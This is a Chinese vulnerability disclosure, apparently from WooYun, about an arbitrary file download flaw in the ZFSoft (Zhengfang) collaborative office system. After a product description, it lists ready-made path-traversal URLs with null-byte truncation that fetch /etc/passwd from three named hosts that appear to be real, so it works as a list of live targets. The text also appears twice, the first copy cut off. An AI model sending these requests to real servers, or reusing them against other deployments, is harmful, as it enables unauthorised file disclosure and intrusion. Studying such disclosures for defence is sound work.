### 0x01 系统介绍 正方协同办公系统的设计目标是帮助各部门快速构建起一个安全、可靠、易用的文档一体化办公环境,实现公文处理的自动化,同时作为内部通讯和信息共享的平台。 系统的特点如下: (1)简单易用:实现快速部署,轻松办公 符合日常办公习惯的界面和操作,通过简单的使用培训,使用人员即可了解系统中的相关办公设置,并可应用系统进行办公。 (2)灵活的自定义功能,满足个性与变化的需求 组织机构、表单格式、工作流程、访问权限、打印格式、统计等全面提供自定义,能够很好的满足各单位现在和未来的办公自动化需求。 (3)多层次的安全设计,为办公自动化提供保障 系统提供了用户名+密码的身份认证、数据库安全性、表单安全性、文档安全性等多层次的安全设计,确保办公自动化系统的安全运行。 (4)稳定可靠 经过大量的功能测试和压力测试,具有很好的稳定性、可靠性。 (5)符合相关规范和标准 完全符合《中国共产党机关公文处理条例》、《国家行政机关公文处理办法》、《国家行政机关公文格式》、《中华人民共和国档案法》、《归档文件整理规则》等规范,对各种办公要素均提供有效的支持。 官方主页:www.zfsoft.com  ### 0x02 漏洞细节 经过url解码构造,发现只要截断就可以下载任意文件: 案例: code 区域 http://202.207.177.104:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://info.lajy.com:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00...
### 0x01 系统介绍 正方协同办公系统的设计目标是帮助各部门快速构建起一个安全、可靠、易用的文档一体化办公环境,实现公文处理的自动化,同时作为内部通讯和信息共享的平台。 系统的特点如下: (1)简单易用:实现快速部署,轻松办公 符合日常办公习惯的界面和操作,通过简单的使用培训,使用人员即可了解系统中的相关办公设置,并可应用系统进行办公。 (2)灵活的自定义功能,满足个性与变化的需求 组织机构、表单格式、工作流程、访问权限、打印格式、统计等全面提供自定义,能够很好的满足各单位现在和未来的办公自动化需求。 (3)多层次的安全设计,为办公自动化提供保障 系统提供了用户名+密码的身份认证、数据库安全性、表单安全性、文档安全性等多层次的安全设计,确保办公自动化系统的安全运行。 (4)稳定可靠 经过大量的功能测试和压力测试,具有很好的稳定性、可靠性。 (5)符合相关规范和标准 完全符合《中国共产党机关公文处理条例》、《国家行政机关公文处理办法》、《国家行政机关公文格式》、《中华人民共和国档案法》、《归档文件整理规则》等规范,对各种办公要素均提供有效的支持。 官方主页:www.zfsoft.com  ### 0x02 漏洞细节 经过url解码构造,发现只要截断就可以下载任意文件: 案例: code 区域 http://202.207.177.104:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://info.lajy.com:8018/zfoa/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00 http://oa.xzcit.cn/gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00  Pocsuite证明:  ### 0x03 参考链接 http://www.wooyun.org/bugs/wooyun-2015-0150337
